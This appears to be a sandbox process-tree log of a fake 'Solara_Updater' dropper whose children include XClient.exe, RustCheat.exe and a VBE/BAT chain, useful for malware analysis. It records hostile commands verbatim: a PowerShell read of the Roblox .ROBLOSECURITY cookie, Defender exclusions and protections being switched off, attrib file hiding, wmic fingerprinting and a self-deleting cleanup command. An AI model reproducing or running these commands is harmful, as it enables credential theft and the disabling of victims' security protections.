[33] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY  PID:1556
[33] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY  PID:924
[33] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic.exe" os get Caption  PID:1868
[33] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic.exe" computersystem get totalphysicalmemory  PID:3060
[33] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic.exe" csproduct get uuid  PID:2680
[33] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER  PID:1864
[33] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic" path win32_VideoController get name  PID:2408
    - Detects videocard installed
[33] C:\Windows\system32\cmd.exe  cmd: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause  PID:1484
[34] C:\Windows\system32\PING.EXE  cmd: ping localhost  PID:668
    - Runs ping.exe
[31] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:3048
[32] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2220
[33] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2716
    - Loads dropped DLL
[34] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2136
[31] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2532
[32] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2768
[33] C:\Users\Admin\AppData\Local\Temp\XClient.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"  PID:2224
[33] C:\Users\Admin\AppData\Local\Temp\RustCheat.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"  PID:1028
[32] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2856
[33] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:1076
[34] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1028
    - Loads dropped DLL
[35] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2480
[32] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:1596
[33] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:1700
[33] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:3024
[34] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2444
[35] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:316
    - Loads dropped DLL
[36] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:1476
[33] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2944
[34] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:3040
[34] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2416
[35] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2596
[36] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:540
    - Loads dropped DLL
[37] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:264
[34] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:808
[35] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2832
[35] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2392
[36] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2456
[37] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2020
    - Loads dropped DLL
[38] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:1528
[35] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2772
[36] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2496
[36] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:1516
[37] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:3008
[38] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1720
    - Loads dropped DLL
[39] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:292
[36] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:296
[37] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2500
[37] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:3016
[38] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:1776
[39] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2760
    - Loads dropped DLL
[40] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2024
[37] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:1364
[38] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:280
[38] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:644
[39] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2736
[40] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1560
    - Loads dropped DLL
[41] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:1508
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"38⤵PID:2880
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"39⤵PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"39⤵PID:1004
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"40⤵PID:2832
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "41⤵
- Loads dropped DLL
PID:1852 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"42⤵PID:2280
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"39⤵PID:2604
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"40⤵PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"40⤵PID:1788
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"41⤵PID:3016
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "42⤵
- Loads dropped DLL
PID:1648 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"43⤵PID:1776
-
-
-
-
-
depth 40  PID 2192  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 41  PID 2584  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 42  PID 2324  image: C:\Users\Admin\AppData\Local\Temp\XClient.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
depth 42  PID 2268  image: C:\Users\Admin\AppData\Local\Temp\RustCheat.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
- Drops file in Drivers directory
depth 43  PID 2104  image: C:\Windows\System32\Wbem\wmic.exe  cmdline: "wmic.exe" csproduct get uuid
depth 43  PID 1792  image: C:\Windows\system32\attrib.exe  cmdline: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
- Views/modifies file attributes
depth 43  PID 2884  image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
- Command and Scripting Interpreter: PowerShell
depth 43  PID 2112  image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
depth 43  PID 2252  image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
depth 43  PID 1364  image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
depth 43  PID 2152  image: C:\Windows\System32\Wbem\wmic.exe  cmdline: "wmic.exe" os get Caption
depth 43  PID 2224  image: C:\Windows\System32\Wbem\wmic.exe  cmdline: "wmic.exe" computersystem get totalphysicalmemory
depth 43  PID 1864  image: C:\Windows\System32\Wbem\wmic.exe  cmdline: "wmic.exe" csproduct get uuid
depth 43  PID 3060  image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
depth 43  PID 1648  image: C:\Windows\System32\Wbem\wmic.exe  cmdline: "wmic" path win32_VideoController get name
- Detects videocard installed
depth 43  PID 1620  image: C:\Windows\system32\cmd.exe  cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
depth 44  PID 2408  image: C:\Windows\system32\PING.EXE  cmdline: ping localhost
- Runs ping.exe
depth 41  PID 2484  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 42  PID 3052  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 43  PID 2416  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 44  PID 496  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 41  PID 2156  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 42  PID 776  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 42  PID 864  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 43  PID 2332  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 44  PID 2092  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 45  PID 2316  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 42  PID 2148  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 43  PID 2712  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 43  PID 2868  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 44  PID 2948  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 45  PID 1728  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 46  PID 1140  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 43  PID 1520  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 44  PID 2500  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 44  PID 1816  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 45  PID 1992  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 46  PID 468  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 47  PID 2904  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 44  PID 1768  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 45  PID 2544  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 45  PID 2528  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 46  PID 2436  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 47  PID 1932  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 48  PID 1560  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 45  PID 1556  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 46  PID 2232  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 46  PID 1932  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 47  PID 1792  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 48  PID 316  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 49  PID 1984  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 46  PID 1740  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 47  PID 2336  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 47  PID 856  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 48  PID 644  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 49  PID 2760  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 50  PID 1712  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 47  PID 1708  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 48  PID 764  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 48  PID 572  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 49  PID 2168  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 50  PID 1856  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 51  PID 2240  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 48  PID 2264  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 49  PID 1080  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 49  PID 1296  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 50  PID 840  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 51  PID 2720  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 52  PID 776  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 49  PID 1240  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 50  PID 2740  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 50  PID 1924  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 51  PID 832  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 52  PID 1208  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 53  PID 1708  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 50  PID 348  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 51  PID 2068  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 52  PID 1296  image: C:\Users\Admin\AppData\Local\Temp\XClient.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
depth 52  PID 2056  image: C:\Users\Admin\AppData\Local\Temp\RustCheat.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
depth 51  PID 2572  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 52  PID 1612  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 53  PID 2544  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 54  PID 2164  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 51  PID 2320  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 52  PID 756  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 52  PID 2444  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 53  PID 996  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 54  PID 2304  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 55  PID 1976  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 52  PID 2264  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 53  PID 1628  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 53  PID 976  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 54  PID 2888  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 55  PID 2532  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 56  PID 768  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 53  PID 1788  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 54  PID 1604  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 54  PID 760  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 55  PID 2008  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 56  PID 2868  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 57  PID 2864  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 54  PID 1028  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 55  PID 2672  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 55  PID 2696  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 56  PID 2440  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 57  PID 2908  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 58  PID 756  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 55  PID 2308  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 56  PID 2548  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 57  PID 1816  image: C:\Users\Admin\AppData\Local\Temp\XClient.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
depth 57  PID 864  image: C:\Users\Admin\AppData\Local\Temp\RustCheat.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
depth 56  PID 2880  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 57  PID 2832  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 58  PID 2896  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 59  PID 536  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 56  PID 2596  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
